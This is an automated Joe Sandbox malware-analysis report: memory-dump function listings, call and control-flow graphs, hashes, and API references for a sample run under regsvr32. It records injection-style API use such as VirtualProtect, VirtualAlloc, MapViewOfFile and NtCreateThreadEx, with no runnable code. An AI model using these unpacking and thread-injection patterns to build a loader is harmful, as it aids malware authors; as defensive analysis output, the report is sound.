                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410138: __getptd.LIBCMT ref: 00410147
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410138: __getptd.LIBCMT ref: 00410155
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d40bfed1f1e99471f44873eb16416b8afd4de05ea498befb25c06c12aa8105ba
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc5b0a9465e1526700206186415ad67edb925928d9d008fc708d202e7da969bc
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d40bfed1f1e99471f44873eb16416b8afd4de05ea498befb25c06c12aa8105ba
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A11E771D00249DFDB00EFA5C845ADD7BB0BB04318F10856AE814AB292DB799A51DF54
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 37864c3f5be63a2b55f177d24d8bdce2b2d517da3df1fba7e4c81dbf3d20f22f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67116D3200814EBBCF165E85CC41CEE3F32BB18355B598856FE2859121D63AC9B2FB99
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                  • String ID: p;C
                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-2027376208
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a82129be9e6a79856bff112ff14f05ab2bd77bcfbb1757ce3dc5d649b7ed77fb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1dca527475a856a563208190b95443e1304a381d554784fdb136edfcfb4db005
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a82129be9e6a79856bff112ff14f05ab2bd77bcfbb1757ce3dc5d649b7ed77fb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11A3713042115BE7288E2FBC90B722295F794724B289A3BE516EB3D0E73CDC52828C
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                                                                                                                                  • String ID: j
                                                                                                                                                                                                                                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d6d97c7de16eb7e09c7d59a5672cf5c2b2a75714001a6a066c6dbfcb644386d6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 172d1e221fa20930680d3a033bc4b89920a22c62889d339da349138c974a4ec9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6d97c7de16eb7e09c7d59a5672cf5c2b2a75714001a6a066c6dbfcb644386d6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24118E31801255DBCB20DF19C0447ADB770BF00318F24817AE8597BAC3C3786999DBC5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410147
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410155
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577926327.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_40b000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a9680110b453a9a50d3c2920676445ab074aa36b42b7325a6449f3b0d1553d6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55b905d71dbe1a9469286b4ad80e262836567c96970bc9265711a4e73c55b92e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a9680110b453a9a50d3c2920676445ab074aa36b42b7325a6449f3b0d1553d6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9011E34400644EFDB34AF65C440BAE73B5AF10315F54452FD086A6A92CB7D89D1DE49
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                  Execution Coverage:27.6%
                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                  Total number of Nodes:52
                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:9
                                                                                                                                                                                                                                                                                                                  execution_graph 1659 2d61287 1660 2d6129c 1659->1660 1665 2d612ee VirtualAlloc 1660->1665 1662 2d612bf 1667 2d61d3e VirtualProtect 1662->1667 1666 2d6137d 1665->1666 1666->1662 1668 2d61dbd 1667->1668 1669 2d61df6 VirtualProtect 1668->1669 1670 2d61e3c 1669->1670 1671 2d62046 VirtualProtect 1670->1671 1720 2d61e41 1721 2d62046 VirtualProtect 1720->1721 1722 2d61ebc 1720->1722 1722->1720 1722->1721 1672 4a81000 1675 4a84194 1672->1675 1673 4a848b9 1674 4a84560 VirtualProtect VirtualProtect 1674->1675 1675->1673 1675->1674 1675->1675 1676 4a844fd VirtualProtect 1675->1676 1677 4a84793 VirtualAlloc 1675->1677 1679 4bac2d0 1675->1679 1676->1675 1677->1675 1680 4bac2fa 1679->1680 1680->1680 1681 4bacfe5 1680->1681 1683 4ba9f10 1680->1683 1681->1675 1685 4ba9f87 1683->1685 1684 4baa068 1684->1680 1685->1684 1689 4ba8b40 1685->1689 1693 4ba1290 1685->1693 1700 4ba8790 1685->1700 1691 4ba8bee 1689->1691 1690 4ba8d6a VirtualAlloc 1690->1691 1691->1690 1692 4ba8dcb 1691->1692 1692->1685 1695 4ba12de 1693->1695 1694 4ba77b9 1694->1685 1695->1694 1704 4ba9c20 1695->1704 1708 4ba7b10 1695->1708 1712 4ba7870 1695->1712 1716 4ba7e00 1695->1716 1703 4ba8832 1700->1703 1701 4ba8a85 VirtualFree 1701->1703 1702 4ba8b08 1702->1685 1703->1701 1703->1702 1707 4ba9cc0 1704->1707 1705 4ba9d28 CreateFileMappingW 1705->1707 1706 4ba9e8a 1706->1695 1707->1705 1707->1706 1709 4ba7bcc 1708->1709 1710 4ba7d42 MapViewOfFile 1709->1710 1711 4ba7dab 1709->1711 1710->1709 1711->1695 1715 4ba78f0 1712->1715 1713 4ba7a4b FindCloseChangeNotification 1713->1715 1714 4ba7aab 1714->1695 1715->1713 1715->1714 1718 4ba7e8e 1716->1718 1717 4ba80b8 1717->1695 1718->1717 1719 4ba8015 NtCreateThreadEx 1718->1719 1719->1718

                                                                                                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                                                                                                  callgraph 0 Function_04A838A8 1 Function_04A838A0 2 Function_04BA99B0 24 Function_04BA77F0 2->24 47 Function_04BAD02C 2->47 3 Function_04A819B8 4 Function_02D616C3 5 Function_02D626CE 27 Function_02D61085 5->27 6 Function_04BA95A0 7 Function_04BA99A0 8 Function_04BA99A4 9 Function_02D616F0 10 Function_02D61BF0 40 Function_02D61CAD 10->40 11 Function_02D61CFE 12 Function_04BA8790 13 Function_04BA1290 35 Function_04BA86D4 13->35 50 Function_04BA9C20 13->50 58 Function_04BA7B10 13->58 67 Function_04BA7E00 13->67 75 Function_04BA7870 13->75 14 Function_04BA9290 22 Function_04BA9984 14->22 36 Function_04BA77D4 14->36 90 Function_04BA7854 14->90 15 Function_04BA8390 16 Function_02D61AFA 39 Function_02D61AAC 16->39 17 Function_04A81998 18 Function_02D619E2 19 Function_02D612EE 19->16 19->40 53 Function_02D6144A 19->53 97 Function_02D6242A 19->97 20 Function_04BAD380 21 Function_04BA9980 23 Function_04A83AEC 25 Function_02D6179A 26 Function_02D61287 26->9 26->19 30 Function_02D620B0 26->30 72 Function_02D61212 26->72 87 Function_02D61D3E 26->87 92 Function_02D61A27 26->92 96 Function_02D6182A 27->96 28 Function_04BA86E0 29 Function_02D61A8B 29->96 30->5 30->53 30->96 30->97 31 Function_04BAC2D0 59 Function_04BA9F10 31->59 32 Function_04BA80D0 33 Function_04BA77D0 34 Function_04BA86D0 37 Function_02D619A7 37->5 37->96 38 Function_04A84BDC 38->0 38->23 55 Function_04A84A0D 38->55 71 Function_04A81968 38->71 91 Function_04A84158 38->91 41 Function_02D617A8 42 Function_04A848D7 42->3 43 Function_04A8112C 44 Function_02D6255E 45 Function_02D61C5A 46 Function_04A8413C 48 Function_02D61E41 48->40 49 Function_04A84130 51 Function_04BA8E20 52 Function_04BAD020 54 Function_02D61F73 56 Function_02D64270 57 Function_04A81000 57->31 57->43 63 Function_04A81018 57->63 73 Function_04A81B60 57->73 88 Function_04A82740 57->88 59->12 59->13 94 Function_04BA8B40 59->94 60 Function_04BA9910 61 Function_04A81005 62 Function_02D61778 62->9 64 Function_02D62463 65 Function_02D61C61 66 Function_02D6176E 68 Function_04BA1000 68->8 69 Function_02D61269 69->96 70 Function_04A84168 72->96 73->3 73->42 74 Function_02D6101F 75->20 77 Function_04BA9274 75->77 76 Function_04BA9270 78 Function_04A81978 79 Function_02D64007 80 Function_02D64005 81 Function_04A8157C 82 Function_02D61203 83 Function_02D61000 83->96 84 Function_02D6400F 85 Function_02D6180B 85->96 86 Function_02D61D37 87->39 87->40 88->38 88->46 88->81 88->88 89 Function_04BA7850 93 Function_04A8195C 95 Function_04BAD040

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A84519
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A8458C
                                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A845AB
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04A847B1
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515698819.0000000004A81000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A81000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4a81000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2541858876-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 16de516e06e8e66aa5ce866b030778eca152c697cd1a4b958882763ec9f574e6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7b5284126ac97a04a78197d87c2bc9b3c36b9e8335794b575cfb37ffff0fe6b5
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16de516e06e8e66aa5ce866b030778eca152c697cd1a4b958882763ec9f574e6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E224E76D002298BDB18CF69C9547D9FBF2BF98314F1581DAD409AB354DB70AA85CF80
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 227 4ba9c20-4ba9cbe 228 4ba9cc0-4ba9cf0 227->228 228->228 229 4ba9cf2-4ba9d21 228->229 230 4ba9d24-4ba9d26 229->230 231 4ba9d28-4ba9d70 CreateFileMappingW 230->231 232 4ba9d72-4ba9d7c 230->232 231->230 233 4ba9e7e-4ba9e88 232->233 234 4ba9d82-4ba9e79 232->234 235 4ba9e8a-4ba9e98 233->235 236 4ba9e99-4ba9ea2 233->236 234->230 237 4ba9ee8-4ba9eff 236->237 238 4ba9ea4-4ba9eae 236->238 237->230 240 4ba9edc-4ba9ee3 238->240 241 4ba9eb0-4ba9eba 238->241 240->230 241->230 243 4ba9ec0-4ba9ed7 241->243 243->230
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • CreateFileMappingW.KERNELBASE(?,?,?,?,?,?), ref: 04BA9D5D
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateFileMapping
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 524692379-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: cdacaac979778fefd264f8ed4dc288567290d959baeb594f67803d64b3c7dcc9
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1eb7082a85d8bd2b6943406e3aada846cf65e610d6868a7a3a3ef7140fd8f3f9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdacaac979778fefd264f8ed4dc288567290d959baeb594f67803d64b3c7dcc9
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E81AC766087419BD728CF29C881A6AF7F2FFC8314F658A1DE9958B354DB34E805CB81
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 244 4ba7e00-4ba7e8a 245 4ba7e8e-4ba7eb2 244->245 245->245 246 4ba7eb4-4ba7ecb 245->246 247 4ba80b8-4ba80c8 246->247 248 4ba7ed1-4ba7eee 246->248 249 4ba7ef2-4ba7efc 248->249 250 4ba8098-4ba80a8 249->250 251 4ba7f02-4ba7f0c 249->251 252 4ba80ac-4ba80ae 250->252 253 4ba8092-4ba8096 251->253 254 4ba7f12-4ba7f1c 251->254 255 4ba80b0-4ba80b2 252->255 253->252 256 4ba8009-4ba8013 254->256 257 4ba7f22-4ba8004 254->257 255->247 255->249 258 4ba8072-4ba807c 256->258 259 4ba8015-4ba8070 NtCreateThreadEx 256->259 257->255 258->255 260 4ba807e-4ba8090 258->260 259->255 260->252
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 04BA805A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 719e5002cb81b7a215bd62144fbea901d1538dc2338f31dfe7ea9ca260cde4d1
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f7c51373c9ab1e67ac2fb32aa2925735c301f75e3c2ee0b9df483daa9b2cff7c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 719e5002cb81b7a215bd62144fbea901d1538dc2338f31dfe7ea9ca260cde4d1
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F817336A083508FD724CF68C88065AF7E2FBC8310F168A6DE995A7394DB75EC15CB91
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 263 4ba7b10-4ba7bca 264 4ba7be9-4ba7c2e 263->264 265 4ba7bcc-4ba7be7 263->265 266 4ba7c32-4ba7c34 264->266 265->264 265->265 267 4ba7c3a-4ba7d11 266->267 268 4ba7d16-4ba7d20 266->268 267->266 269 4ba7de3-4ba7df5 268->269 270 4ba7d26-4ba7d30 268->270 269->266 271 4ba7d36-4ba7d40 270->271 272 4ba7dd7-4ba7dde 270->272 274 4ba7d8f-4ba7d99 271->274 275 4ba7d42-4ba7d8a MapViewOfFile 271->275 272->266 276 4ba7d9b-4ba7da5 274->276 277 4ba7dbf-4ba7dd2 274->277 275->266 276->266 279 4ba7dab-4ba7dbe 276->279 277->266
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04BA7D72
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FileView
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3314676101-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 06bff93787ebbf6612692ecf6ac2818c7955d71518eeba64749a1024f9661181
                                                                                                                                                                                                                                                                                                                  • Instruction ID: f1687c2d89bc6217a7e80eec3fbad479b11166fd69e7c3d2759215384f33a28c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06bff93787ebbf6612692ecf6ac2818c7955d71518eeba64749a1024f9661181
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D81AF3660C3518FC724CE29C880A5AB7E3FFC8314F268A5DE5949B354DB75E946CB82
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 280 4ba7870-4ba78ee 281 4ba78f0-4ba790a 280->281 281->281 282 4ba790c-4ba792c 281->282 283 4ba7930-4ba7932 282->283 284 4ba7938-4ba7a3a call 4ba9274 call 4bad380 283->284 285 4ba7a3f-4ba7a49 283->285 284->283 287 4ba7a4b-4ba7a82 FindCloseChangeNotification 285->287 288 4ba7a87-4ba7a91 285->288 287->283 290 4ba7afe 288->290 291 4ba7a93-4ba7a9d 288->291 292 4ba7b02-4ba7b06 290->292 293 4ba7ae8-4ba7afc 291->293 294 4ba7a9f-4ba7aa9 291->294 292->283 293->292 295 4ba7aab-4ba7abe 294->295 296 4ba7abf-4ba7ac9 294->296 296->283 298 4ba7acf-4ba7ae6 296->298 298->292
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 04BA7A69
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2591292051-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d25812b615570ec8763b3d22dc75a4a9fdb8312fee5166dd644cc02922c6cdc
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 03ab04ff3532767b9aad942611e8b5347d6bde5492533477bea2a9556cc27818
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d25812b615570ec8763b3d22dc75a4a9fdb8312fee5166dd644cc02922c6cdc
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18716C35A083509FC324CF79C9C4A5BB7E2BBC9700F158A6DE59997358DB70A806CB92
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 302 4ba8790-4ba8830 303 4ba8832-4ba885b 302->303 303->303 304 4ba885d-4ba88c0 303->304 305 4ba88c6-4ba88c8 304->305 306 4ba88ca-4ba88db 305->306 307 4ba88e0-4ba88eb 305->307 308 4ba8b2f-4ba8b33 306->308 309 4ba88ed-4ba88f0 307->309 310 4ba88f5-4ba8903 307->310 308->305 309->308 311 4ba8b1a-4ba8b29 310->311 312 4ba8909-4ba8917 310->312 311->308 313 4ba8a7b-4ba8a83 312->313 314 4ba891d-4ba8a0e 312->314 315 4ba8afa-4ba8b02 313->315 316 4ba8a85-4ba8adc VirtualFree 313->316 321 4ba8a10-4ba8a3c 314->321 315->305 318 4ba8b08-4ba8b17 315->318 317 4ba8ae2-4ba8af5 316->317 317->305 321->321 322 4ba8a3e-4ba8a79 321->322 322->317
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(?,?,?), ref: 04BA8AAD
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: c30c8abe24eee58eb722ef07d6e4d4ec425960f67fd6eea0e39c46d19ee24795
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4fc5d1af86c8634e1efd7b1b4d2386e9793e63e3dc76f070792e1d23f1f68cf6
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c30c8abe24eee58eb722ef07d6e4d4ec425960f67fd6eea0e39c46d19ee24795
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67B12676E012288FDB10CF69C94069DFBB6BF99314F26819AC409B7351DB74AD86CF90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 323 4ba8b40-4ba8bec 324 4ba8bee-4ba8c15 323->324 324->324 325 4ba8c17-4ba8c58 324->325 326 4ba8c5e-4ba8c60 325->326 327 4ba8c79-4ba8c81 326->327 328 4ba8c62-4ba8c77 326->328 329 4ba8d60-4ba8d68 327->329 330 4ba8c87-4ba8d5e 327->330 328->326 331 4ba8d6a-4ba8da9 VirtualAlloc 329->331 332 4ba8db7-4ba8dbf 329->332 334 4ba8dac-4ba8db2 330->334 331->334 335 4ba8dc1-4ba8dc9 332->335 336 4ba8e06-4ba8e0c 332->336 334->326 337 4ba8ddb-4ba8de3 335->337 338 4ba8dcb-4ba8dda 335->338 336->326 337->326 340 4ba8de9-4ba8e01 337->340 340->326
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04BA8D92
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2515850509.0000000004BA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BA1000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_4ba1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8475a932525000db7fc2d49a9e4ad377bf82fef198a3f7c10188e75561372b36
